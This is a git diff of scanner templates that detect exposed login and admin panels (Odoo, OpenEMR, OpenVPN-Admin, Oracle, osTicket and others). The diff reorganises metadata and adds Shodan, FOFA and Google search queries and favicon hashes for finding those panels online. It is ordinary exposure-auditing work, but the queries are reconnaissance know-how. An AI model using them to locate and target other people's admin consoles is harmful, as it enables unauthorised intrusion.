vendor: odoo verified: true + max-request: 2 + vendor: odoo + product: odoo + shodan-query: + - title:"Odoo" + - http.title:"odoo" + - cpe:"cpe:2.3:a:odoo:odoo" + fofa-query: title="odoo" + google-query: intitle:"odoo" tags: login,panel,odoo http: diff --git a/http/exposed-panels/office-webapps-panel.yaml b/http/exposed-panels/office-webapps-panel.yaml index 70bf654553..49d407c4aa 100644 --- a/http/exposed-panels/office-webapps-panel.yaml +++ b/http/exposed-panels/office-webapps-panel.yaml @@ -12,11 +12,14 @@ info: cwe-id: CWE-668 cpe: cpe:2.3:a:microsoft:office_web_apps_server:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: office_web_apps_server - shodan-query: html:"Provide a link that opens Word" - vendor: microsoft verified: true + max-request: 2 + vendor: microsoft + product: office_web_apps_server + shodan-query: + - html:"Provide a link that opens Word" + - http.html:"provide a link that opens word" + fofa-query: body="provide a link that opens word" tags: panel,office-webapps,login,microsoft http: diff --git a/http/exposed-panels/officekeeper-admin-login.yaml b/http/exposed-panels/officekeeper-admin-login.yaml index aa0d9d3b66..68e39c8451 100644 --- a/http/exposed-panels/officekeeper-admin-login.yaml +++ b/http/exposed-panels/officekeeper-admin-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.favicon.hash:-800060828 - verified: true tags: officekeeper,dlp,panel http: diff --git a/http/exposed-panels/oipm-detect.yaml b/http/exposed-panels/oipm-detect.yaml index 45aa8f0861..9731116b71 100644 --- a/http/exposed-panels/oipm-detect.yaml +++ b/http/exposed-panels/oipm-detect.yaml @@ -5,16 +5,16 @@ info: author: nodauf severity: info description: One Identity Password Manager is a secure password manager that gives enterprises control over password management, policies, and automated reset functions. + remediation: Ensure proper access. reference: - https://www.oneidentity.com/techbrief/security-guide-for-password-manager821177/ - remediation: Ensure proper access. classification: cwe-id: CWE-200 cpe: cpe:2.3:a:oneidentity:password_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: password_manager vendor: oneidentity + product: password_manager tags: panel,oneidentity http: diff --git a/http/exposed-panels/olt-web-interface.yaml b/http/exposed-panels/olt-web-interface.yaml index 00908dc3b3..5b9c39153d 100644 --- a/http/exposed-panels/olt-web-interface.yaml +++ b/http/exposed-panels/olt-web-interface.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"OLT Web Management Interface" - verified: true tags: edb,panel,olt http: diff --git a/http/exposed-panels/omniampx-panel.yaml b/http/exposed-panels/omniampx-panel.yaml index a85d6826eb..8e03c543cf 100644 --- a/http/exposed-panels/omniampx-panel.yaml +++ b/http/exposed-panels/omniampx-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"Omnia MPX" - verified: true tags: panel,omnia,omniampx http: diff --git a/http/exposed-panels/onlyoffice-login-panel.yaml b/http/exposed-panels/onlyoffice-login-panel.yaml index 02193adf05..0c8d7fa744 100644 --- a/http/exposed-panels/onlyoffice-login-panel.yaml +++ b/http/exposed-panels/onlyoffice-login-panel.yaml @@ -9,11 +9,13 @@ info: classification: cpe: cpe:2.3:a:onlyoffice:onlyoffice:*:*:*:*:*:*:*:* metadata: - fofa-query: app="ONLYOFFICE" && (icon_hash="1928933157" || icon_hash="826083956" || icon_hash="-1380930248" || icon_hash="-285544629" || icon_hash="812741391") - max-request: 2 - product: onlyoffice - vendor: onlyoffice verified: true + max-request: 2 + vendor: onlyoffice + product: onlyoffice + fofa-query: + - app="ONLYOFFICE" && (icon_hash="1928933157" || icon_hash="826083956" || icon_hash="-1380930248" || icon_hash="-285544629" || icon_hash="812741391") + - app="onlyoffice" && (icon_hash="1928933157" || icon_hash="826083956" || icon_hash="-1380930248" || icon_hash="-285544629" || icon_hash="812741391") tags: panel,onlyoffice,detect http: diff --git a/http/exposed-panels/open-stack-dashboard-login.yaml b/http/exposed-panels/open-stack-dashboard-login.yaml index 97e3553a22..eea83a37ab 100644 --- a/http/exposed-panels/open-stack-dashboard-login.yaml +++ b/http/exposed-panels/open-stack-dashboard-login.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:openstack:horizon:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: horizon vendor: openstack + product: horizon tags: panel,openstack,edb http: diff --git a/http/exposed-panels/open-virtualization-manager-panel.yaml b/http/exposed-panels/open-virtualization-manager-panel.yaml index 5a379e5aa8..a3802f7d5d 100644 --- a/http/exposed-panels/open-virtualization-manager-panel.yaml +++ b/http/exposed-panels/open-virtualization-manager-panel.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-668 metadata: - google-query: intitle:"Ovirt-Engine" max-request: 2 shodan-query: title:"Ovirt-Engine" + google-query: intitle:"Ovirt-Engine" tags: panel,ovirt,oss http: diff --git a/http/exposed-panels/openam-panel.yaml b/http/exposed-panels/openam-panel.yaml index e127120b14..436d7cb379 100644 --- a/http/exposed-panels/openam-panel.yaml +++ b/http/exposed-panels/openam-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:forgerock:openam:*:*:*:*:*:*:*:* metadata: max-request: 20 - product: openam - shodan-query: http.title:"OpenAM" vendor: forgerock + product: openam + shodan-query: + - http.title:"OpenAM" + - http.title:"openam" + fofa-query: title="openam" + google-query: intitle:"openam" tags: panel,openam,opensso,login,forgerock http: diff --git a/http/exposed-panels/openbullet2-panel.yaml b/http/exposed-panels/openbullet2-panel.yaml index 5a91a23619..c5e63ad541 100644 --- a/http/exposed-panels/openbullet2-panel.yaml +++ b/http/exposed-panels/openbullet2-panel.yaml @@ -9,9 +9,9 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N metadata: + verified: "true" max-request: 1 shodan-query: http.favicon.hash:-1264095219 - verified: "true" tags: openbullet,panel,login http: diff --git a/http/exposed-panels/opencart-panel.yaml b/http/exposed-panels/opencart-panel.yaml index 47f378633d..4d7e03b75f 100644 --- a/http/exposed-panels/opencart-panel.yaml +++ b/http/exposed-panels/opencart-panel.yaml @@ -13,11 +13,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:opencart:opencart:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: opencart - shodan-query: html:"OpenCart" - vendor: opencart verified: true + max-request: 2 + vendor: opencart + product: opencart + shodan-query: + - html:"OpenCart" + - http.html:"opencart" + - cpe:"cpe:2.3:a:opencart:opencart" + fofa-query: body="opencart" tags: panel,opencart http: diff --git a/http/exposed-panels/opencats-panel.yaml b/http/exposed-panels/opencats-panel.yaml index 821f0df3ea..038051f445 100644 --- a/http/exposed-panels/opencats-panel.yaml +++ b/http/exposed-panels/opencats-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:opencats:opencats:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: opencats - shodan-query: title:"opencats" - vendor: opencats verified: true + max-request: 2 + vendor: opencats + product: opencats + shodan-query: + - title:"opencats" + - http.title:"opencats" + fofa-query: title="opencats" + google-query: intitle:"opencats" tags: panel,opencats http: diff --git a/http/exposed-panels/openemr-detect.yaml b/http/exposed-panels/openemr-detect.yaml index b74f7c5519..60a0ec54a8 100644 --- a/http/exposed-panels/openemr-detect.yaml +++ b/http/exposed-panels/openemr-detect.yaml @@ -10,11 +10,21 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* metadata: - fofa-query: app="OpenEMR" max-request: 1 - product: openemr - shodan-query: http.html:"OpenEMR" vendor: open-emr + product: openemr + shodan-query: + - http.html:"OpenEMR" + - http.html:"openemr" + - http.title:"openemr" + - http.favicon.hash:1971268439 + fofa-query: + - app="OpenEMR" + - body="openemr" + - title="openemr" + - app="openemr" + - icon_hash=1971268439 + google-query: intitle:"openemr" tags: panel,openemr,open-emr http: diff --git a/http/exposed-panels/openerp-database.yaml b/http/exposed-panels/openerp-database.yaml index 15b3cf9a71..0f21421401 100644 --- a/http/exposed-panels/openerp-database.yaml +++ b/http/exposed-panels/openerp-database.yaml @@ -11,8 +11,13 @@ info: cpe: cpe:2.3:a:odoo:odoo:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: odoo vendor: odoo + product: odoo + shodan-query: + - http.title:"odoo" + - cpe:"cpe:2.3:a:odoo:odoo" + fofa-query: title="odoo" + google-query: intitle:"odoo" tags: openerp,panel,odoo http: diff --git a/http/exposed-panels/openfire-admin-panel.yaml b/http/exposed-panels/openfire-admin-panel.yaml index b50f092600..14ffd89398 100644 --- a/http/exposed-panels/openfire-admin-panel.yaml +++ b/http/exposed-panels/openfire-admin-panel.yaml @@ -10,11 +10,20 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: openfire - shodan-query: http.title:"Openfire Admin Console" - vendor: igniterealtime verified: true + max-request: 2 + vendor: igniterealtime + product: openfire + shodan-query: + - http.title:"Openfire Admin Console" + - http.title:"openfire" + - http.title:"openfire admin console" + fofa-query: + - title="openfire" + - title="openfire admin console" + google-query: + - intitle:"openfire admin console" + - intitle:"openfire" tags: panel,openfire,admin,console,igniterealtime http: diff --git a/http/exposed-panels/opengear-panel.yaml b/http/exposed-panels/opengear-panel.yaml index 6cd156b4a8..a09021d32c 100644 --- a/http/exposed-panels/opengear-panel.yaml +++ b/http/exposed-panels/opengear-panel.yaml @@ -10,10 +10,10 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true + max-request: 1 fofa-query: app="opengear-Management-Console" google-query: intitle:"Opengear Management Console" - max-request: 1 - verified: true tags: panel,opengear http: diff --git a/http/exposed-panels/opennebula-panel.yaml b/http/exposed-panels/opennebula-panel.yaml index 4daec8781b..02dafdbc83 100644 --- a/http/exposed-panels/opennebula-panel.yaml +++ b/http/exposed-panels/opennebula-panel.yaml @@ -13,9 +13,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"opennebula" - verified: true tags: panel,opennebula,cloud http: diff --git a/http/exposed-panels/opennms-web-console.yaml b/http/exposed-panels/opennms-web-console.yaml index b82544a167..226a9b0529 100644 --- a/http/exposed-panels/opennms-web-console.yaml +++ b/http/exposed-panels/opennms-web-console.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:opennms:opennms:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: opennms vendor: opennms + product: opennms tags: panel,login,edb,opennms http: diff --git a/http/exposed-panels/opensis-panel.yaml b/http/exposed-panels/opensis-panel.yaml index 33455476e0..09e3667be0 100644 --- a/http/exposed-panels/opensis-panel.yaml +++ b/http/exposed-panels/opensis-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:os4ed:opensis:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: opensis - shodan-query: http.title:"openSIS" vendor: os4ed + product: opensis + shodan-query: + - http.title:"openSIS" + - http.title:"opensis" + fofa-query: title="opensis" + google-query: intitle:"opensis" tags: panel,opensis,login,os4ed http: diff --git a/http/exposed-panels/opentouch-multimediaservices-panel.yaml b/http/exposed-panels/opentouch-multimediaservices-panel.yaml index 924c7b80f5..471db9f2f1 100644 --- a/http/exposed-panels/opentouch-multimediaservices-panel.yaml +++ b/http/exposed-panels/opentouch-multimediaservices-panel.yaml @@ -9,8 +9,8 @@ info: reference: - https://www.al-enterprise.com/-/media/assets/internet/documents/opentouch-multimedia-services-datasheet-en.pdf metadata: - max-request: 2 verified: true + max-request: 2 tags: panel,opentouch,login,detect http: diff --git a/http/exposed-panels/openvas-panel.yaml b/http/exposed-panels/openvas-panel.yaml index b9ee0bb264..b92ace7112 100644 --- a/http/exposed-panels/openvas-panel.yaml +++ b/http/exposed-panels/openvas-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://openvas.org/ metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:1606029165 - verified: true tags: panel,openvas,admin,login http: diff --git a/http/exposed-panels/openvpn-admin.yaml b/http/exposed-panels/openvpn-admin.yaml index 56b4ab95c7..7973f1fa5c 100644 --- a/http/exposed-panels/openvpn-admin.yaml +++ b/http/exposed-panels/openvpn-admin.yaml @@ -10,11 +10,19 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:openvpn:openvpn:*:*:*:*:*:*:*:* metadata: - max-request: 3 - product: openvpn - shodan-query: http.title:"OpenVPN-Admin" - vendor: openvpn verified: true + max-request: 3 + vendor: openvpn + product: openvpn + shodan-query: + - http.title:"OpenVPN-Admin" + - http.html:"router management - server openvpn" + - http.title:"openvpn-admin" + - cpe:"cpe:2.3:a:openvpn:openvpn" + fofa-query: + - body="router management - server openvpn" + - title="openvpn-admin" + google-query: intitle:"openvpn-admin" tags: panel,openvpn,admin,config http: diff --git a/http/exposed-panels/openvpn-connect.yaml b/http/exposed-panels/openvpn-connect.yaml index b98fa64c01..9d32b9c222 100644 --- a/http/exposed-panels/openvpn-connect.yaml +++ b/http/exposed-panels/openvpn-connect.yaml @@ -10,11 +10,13 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:openvpn:connect:*:*:*:*:macos:*:*:* metadata: + verified: true max-request: 1 + vendor: openvpn product: connect shodan-query: http.title:"openvpn connect" - vendor: openvpn - verified: true + fofa-query: title="openvpn connect" + google-query: intitle:"openvpn connect" tags: panel,openvpn,connect,vpn http: diff --git a/http/exposed-panels/openvpn-router-management.yaml b/http/exposed-panels/openvpn-router-management.yaml index cd56bf19da..76be02a066 100644 --- a/http/exposed-panels/openvpn-router-management.yaml +++ b/http/exposed-panels/openvpn-router-management.yaml @@ -10,11 +10,19 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:openvpn:openvpn:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: openvpn - shodan-query: http.html:"Router Management - Server OpenVPN" - vendor: openvpn verified: true + max-request: 1 + vendor: openvpn + product: openvpn + shodan-query: + - http.html:"Router Management - Server OpenVPN" + - http.html:"router management - server openvpn" + - http.title:"openvpn-admin" + - cpe:"cpe:2.3:a:openvpn:openvpn" + fofa-query: + - body="router management - server openvpn" + - title="openvpn-admin" + google-query: intitle:"openvpn-admin" tags: panel,openvpn,router http: diff --git a/http/exposed-panels/openvz-web-login.yaml b/http/exposed-panels/openvz-web-login.yaml index 6209ebeb92..8618716b75 100644 --- a/http/exposed-panels/openvz-web-login.yaml +++ b/http/exposed-panels/openvz-web-login.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:-1898583197 - verified: true tags: panel,openvz http: diff --git a/http/exposed-panels/openwebui-panel.yaml b/http/exposed-panels/openwebui-panel.yaml index 2d0e3c48b8..718b5fa5be 100644 --- a/http/exposed-panels/openwebui-panel.yaml +++ b/http/exposed-panels/openwebui-panel.yaml @@ -1,19 +1,19 @@ id: openwebui-panel -info: - name: Openweb UI Panel - Detect - author: rxerium - severity: info - description: | - An OpenWebUI panel was detected - reference: - - https://openwebui.com/ - metadata: - shodan-query: http.favicon.hash:-286484075 - verified: true - max-request: 1 - tags: panel,openwebui,login - +info: + name: Openweb UI Panel - Detect + author: rxerium + severity: info + description: | + An OpenWebUI panel was detected + reference: + - https://openwebui.com/ + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:-286484075 + tags: panel,openwebui,login + http: - method: GET path: diff --git a/http/exposed-panels/openwrt-login.yaml b/http/exposed-panels/openwrt-login.yaml index 5e382c6e0a..e6630d1c9a 100644 --- a/http/exposed-panels/openwrt-login.yaml +++ b/http/exposed-panels/openwrt-login.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:o:openwrt:openwrt:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: openwrt - shodan-query: http.title:"OpenWrt - LuCI" vendor: openwrt + product: openwrt + shodan-query: + - http.title:"OpenWrt - LuCI" + - http.title:"openwrt - luci" + fofa-query: title="openwrt - luci" + google-query: intitle:"openwrt - luci" tags: openwrt,router,panel http: diff --git a/http/exposed-panels/openwrt/openwrt-luci-panel.yaml b/http/exposed-panels/openwrt/openwrt-luci-panel.yaml index 028980bfc7..a8a0927243 100644 --- a/http/exposed-panels/openwrt/openwrt-luci-panel.yaml +++ b/http/exposed-panels/openwrt/openwrt-luci-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:x-wrt:luci:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: luci - shodan-query: http.title:"OpenWrt - LuCI" vendor: x-wrt + product: luci + shodan-query: + - http.title:"OpenWrt - LuCI" + - http.title:"openwrt - luci" + fofa-query: title="openwrt - luci" + google-query: intitle:"openwrt - luci" tags: panel,default-login,openwrt,x-wrt http: diff --git a/http/exposed-panels/openx-panel.yaml b/http/exposed-panels/openx-panel.yaml index 87e35cb694..9a9b174f01 100644 --- a/http/exposed-panels/openx-panel.yaml +++ b/http/exposed-panels/openx-panel.yaml @@ -12,11 +12,18 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: revive_adserver - shodan-query: title:"Revive Adserver" - vendor: revive-adserver verified: true + max-request: 2 + vendor: revive-adserver + product: revive_adserver + shodan-query: + - title:"Revive Adserver" + - http.title:"revive adserver" + - http.favicon.hash:106844876 + fofa-query: + - icon_hash=106844876 + - title="revive adserver" + google-query: intitle:"revive adserver" tags: panel,openx,revive,adserver,login,revive-adserver http: diff --git a/http/exposed-panels/opinio-panel.yaml b/http/exposed-panels/opinio-panel.yaml index fcfbed532f..09e6e415fc 100644 --- a/http/exposed-panels/opinio-panel.yaml +++ b/http/exposed-panels/opinio-panel.yaml @@ -8,9 +8,9 @@ info: reference: - https://www.objectplanet.com/opinio/ metadata: + verified: true max-request: 2 shodan-query: http.title:"Opinio" - verified: true tags: panel,opinio,login,detect http: diff --git a/http/exposed-panels/oracle-access-management.yaml b/http/exposed-panels/oracle-access-management.yaml index 93c67194c6..6bb460dbd8 100644 --- a/http/exposed-panels/oracle-access-management.yaml +++ b/http/exposed-panels/oracle-access-management.yaml @@ -1,22 +1,30 @@ id: oracle-access-management -info: - name: Oracle Access Management Login Panel - Detect - author: righettod - severity: info - description: Oracle Access Management login panel was detected. - reference: - - https://www.oracle.com/security/identity-management/access-management/ - classification: - cpe: cpe:2.3:a:oracle:access_manager:*:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 1 - shodan-query: http.title:"Oracle Access Management" - fofa-query: title="Oracle Access Management" - vendor: oracle - tags: panel,oracle,login,detect - +info: + name: Oracle Access Management Login Panel - Detect + author: righettod + severity: info + description: Oracle Access Management login panel was detected. + reference: + - https://www.oracle.com/security/identity-management/access-management/ + classification: + cpe: cpe:2.3:a:oracle:access_manager:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: oracle + product: access_manager + shodan-query: + - "http.title:\"Oracle Access Management\"" + - http.title:"oracle access management" + - http.html:"/oam/pages/css/login_page.css" + fofa-query: + - "title=\"Oracle Access Management\"" + - title="oracle access management" + - body="/oam/pages/css/login_page.css" + google-query: intitle:"oracle access management" + tags: panel,oracle,login,detect + http: - method: GET path: diff --git a/http/exposed-panels/oracle-business-control.yaml b/http/exposed-panels/oracle-business-control.yaml index 4c75837dae..93f4061ee4 100644 --- a/http/exposed-panels/oracle-business-control.yaml +++ b/http/exposed-panels/oracle-business-control.yaml @@ -12,10 +12,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:oracle:commerce:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: commerce - shodan-query: http.title:"Oracle Commerce" + max-request: 2 vendor: oracle + product: commerce + shodan-query: + - "http.title:\"Oracle Commerce\"" + - http.title:"oracle commerce" + - cpe:"cpe:2.3:a:oracle:commerce" + fofa-query: title="oracle commerce" + google-query: intitle:"oracle commerce" tags: oracle,login,panel http: diff --git a/http/exposed-panels/oracle-business-intelligence.yaml b/http/exposed-panels/oracle-business-intelligence.yaml index 5efc63b867..62d377fc07 100644 --- a/http/exposed-panels/oracle-business-intelligence.yaml +++ b/http/exposed-panels/oracle-business-intelligence.yaml @@ -12,11 +12,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:oracle:business_intelligence:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: business_intelligence - shodan-query: http.title:"Oracle Business Intelligence Sign In" - vendor: oracle verified: true + max-request: 3 + vendor: oracle + product: "business_intelligence" + shodan-query: + - "http.title:\"Oracle Business Intelligence Sign In\"" + - http.title:"oracle business intelligence sign in" + fofa-query: title="oracle business intelligence sign in" + google-query: intitle:"oracle business intelligence sign in" tags: panel,oracle,login,detect http: diff --git a/http/exposed-panels/oracle-ebusiness-panel.yaml b/http/exposed-panels/oracle-ebusiness-panel.yaml index 648172e2b0..a3784e7416 100644 --- a/http/exposed-panels/oracle-ebusiness-panel.yaml +++ b/http/exposed-panels/oracle-ebusiness-panel.yaml @@ -1,19 +1,19 @@ id: oracle-ebusiness-panel -info: - name: Oracle E-Business Suite Login Panel - Detect - author: righettod - severity: info - description: | - Oracle E-Business Suite login panel was detected. - reference: - - https://www.oracle.com/applications/ebusiness/ - metadata: - max-request: 1 - verified: true - shodan-query: http.html:"Oracle UIX" - tags: panel,oracle,login,detect - +info: + name: Oracle E-Business Suite Login Panel - Detect + author: righettod + severity: info + description: | + Oracle E-Business Suite login panel was detected. + reference: + - https://www.oracle.com/applications/ebusiness/ + metadata: + verified: true + max-request: 1 + shodan-query: http.html:"Oracle UIX" + tags: panel,oracle,login,detect + http: - method: GET path: diff --git a/http/exposed-panels/oracle-enterprise-manager-login.yaml b/http/exposed-panels/oracle-enterprise-manager-login.yaml index fada237b4f..f429b34a0c 100644 --- a/http/exposed-panels/oracle-enterprise-manager-login.yaml +++ b/http/exposed-panels/oracle-enterprise-manager-login.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:oracle:enterprise_manager_base_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: enterprise_manager_base_platform vendor: oracle + product: enterprise_manager_base_platform tags: panel,oracle,manager,login http: diff --git a/http/exposed-panels/oracle-opera-login.yaml b/http/exposed-panels/oracle-opera-login.yaml index a7e758cb87..2192be78cb 100644 --- a/http/exposed-panels/oracle-opera-login.yaml +++ b/http/exposed-panels/oracle-opera-login.yaml @@ -7,9 +7,9 @@ info: classification: cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: title:"Oracle Opera" && html:"/OperaLogin/Welcome.do" - verified: true tags: panel,opera,oracle,detect http: diff --git a/http/exposed-panels/oracle-people-enterprise.yaml b/http/exposed-panels/oracle-people-enterprise.yaml index 8f412d914d..62758d1d96 100644 --- a/http/exposed-panels/oracle-people-enterprise.yaml +++ b/http/exposed-panels/oracle-people-enterprise.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:oracle:peoplesoft_enterprise:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: peoplesoft_enterprise - shodan-query: http.title:"Oracle Peoplesoft Enterprise" vendor: oracle + product: peoplesoft_enterprise + shodan-query: + - http.title:"Oracle Peoplesoft Enterprise" + - http.title:"oracle peoplesoft enterprise" + fofa-query: title="oracle peoplesoft enterprise" + google-query: intitle:"oracle peoplesoft enterprise" tags: oracle,login,panel http: diff --git a/http/exposed-panels/oracle-peoplesoft-panel.yaml b/http/exposed-panels/oracle-peoplesoft-panel.yaml index 27836986ac..07e915ebdd 100644 --- a/http/exposed-panels/oracle-peoplesoft-panel.yaml +++ b/http/exposed-panels/oracle-peoplesoft-panel.yaml @@ -12,9 +12,9 @@ info: cwe-id: CWE-200 metadata: verified: true - max-request: 7 - shodan-query: http.title:"Oracle PeopleSoft Sign-in" - fofa-query: title="Oracle PeopleSoft Sign-in" + max-request: 12 + shodan-query: "http.title:\"Oracle PeopleSoft Sign-in\"" + fofa-query: "title=\"Oracle PeopleSoft Sign-in\"" tags: oracle,peoplesoft,panel,login,detect http: diff --git a/http/exposed-panels/orchid-vms-panel.yaml b/http/exposed-panels/orchid-vms-panel.yaml index d5ba591ace..fa796a3712 100644 --- a/http/exposed-panels/orchid-vms-panel.yaml +++ b/http/exposed-panels/orchid-vms-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:ipconfigure:orchid_core_vms:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: orchid_core_vms - shodan-query: http.title:"Orchid Core VMS" vendor: ipconfigure + product: orchid_core_vms + shodan-query: + - http.title:"Orchid Core VMS" + - http.title:"orchid core vms" + fofa-query: title="orchid core vms" + google-query: intitle:"orchid core vms" tags: panel,orchid,ipconfigure http: diff --git a/http/exposed-panels/osticket-panel.yaml b/http/exposed-panels/osticket-panel.yaml index 048f7c665f..132db24ad5 100644 --- a/http/exposed-panels/osticket-panel.yaml +++ b/http/exposed-panels/osticket-panel.yaml @@ -10,11 +10,22 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: osticket - shodan-query: http.html:"powered by osTicket" - vendor: osticket verified: true + max-request: 2 + vendor: osticket + product: osticket + shodan-query: + - http.html:"powered by osTicket" + - http.title:"osticket" + - http.html:"powered by osticket" + - http.title:"osticket installer" + fofa-query: + - body="powered by osticket" + - title="osticket" + - title="osticket installer" + google-query: + - intitle:"osticket" + - intitle:"osticket installer" tags: panel,osticket http: diff --git a/http/exposed-panels/osticket/osticket-install.yaml b/http/exposed-panels/osticket/osticket-install.yaml index 560dccff29..6a4db2fa22 100644 --- a/http/exposed-panels/osticket/osticket-install.yaml +++ b/http/exposed-panels/osticket/osticket-install.yaml @@ -11,11 +11,22 @@ info: cwe-id: CWE-284 cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: osticket - shodan-query: http.title:"osTicket Installer" - vendor: osticket verified: true + max-request: 2 + vendor: osticket + product: osticket + shodan-query: + - http.title:"osTicket Installer" + - http.title:"osticket" + - http.html:"powered by osticket" + - http.title:"osticket installer" + fofa-query: + - body="powered by osticket" + - title="osticket" + - title="osticket installer" + google-query: + - intitle:"osticket" + - intitle:"osticket installer" tags: panel,osticket,install http: diff --git a/http/exposed-panels/ourmgmt3-panel.yaml b/http/exposed-panels/ourmgmt3-panel.yaml index d64d1abaa4..9f2d767df5 100644 --- a/http/exposed-panels/ourmgmt3-panel.yaml +++ b/http/exposed-panels/ourmgmt3-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.title:"OurMGMT3" - verified: true tags: panel,ourmgmt3 http: diff --git a/http/exposed-panels/outsystems-servicecenter-panel.yaml b/http/exposed-panels/outsystems-servicecenter-panel.yaml index 25363b87a5..a0340e6596 100644 --- a/http/exposed-panels/outsystems-servicecenter-panel.yaml +++ b/http/exposed-panels/outsystems-servicecenter-panel.yaml @@ -10,8 +10,8 @@ info: - https://www.outsystems.com/ metadata: verified: true - max-request: 1 - shodan-query: http.html:"outsystems" + max-request: 2 + shodan-query: "http.html:\"outsystems\"" tags: panel,outsystems,login,detect http: diff --git a/http/exposed-panels/overseerr-panel.yaml b/http/exposed-panels/overseerr-panel.yaml index 87932b0891..c33b8921a3 100644 --- a/http/exposed-panels/overseerr-panel.yaml +++ b/http/exposed-panels/overseerr-panel.yaml @@ -10,9 +10,9 @@ info: - https://overseerr.dev/ - https://github.com/sct/overseerr metadata: - fofa-query: Overseerr account - max-request: 1 verified: true + max-request: 1 + fofa-query: Overseerr account tags: panel,overseerr,detect http: diff --git a/http/exposed-panels/pahtool-panel.yaml b/http/exposed-panels/pahtool-panel.yaml index 012020c54a..99d4ab7d33 100644 --- a/http/exposed-panels/pahtool-panel.yaml +++ b/http/exposed-panels/pahtool-panel.yaml @@ -9,9 +9,9 @@ info: reference: - http://www.inovultus.com/index.html metadata: + verified: true max-request: 1 shodan-query: http.title:"PAHTool" - verified: true tags: panel,pahtool,login,detect http: diff --git a/http/exposed-panels/pairdrop-panel.yaml b/http/exposed-panels/pairdrop-panel.yaml index d2474629df..79580f49f0 100644 --- a/http/exposed-panels/pairdrop-panel.yaml +++ b/http/exposed-panels/pairdrop-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/schlagmichdoch/pairdrop metadata: + verified: true max-request: 1 shodan-query: title:"PairDrop" - verified: true tags: panel,pairdrop,login http: diff --git a/http/exposed-panels/panabit-panel.yaml b/http/exposed-panels/panabit-panel.yaml index 668ea10cdc..7e918ecb69 100644 --- a/http/exposed-panels/panabit-panel.yaml +++ b/http/exposed-panels/panabit-panel.yaml @@ -11,8 +11,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - 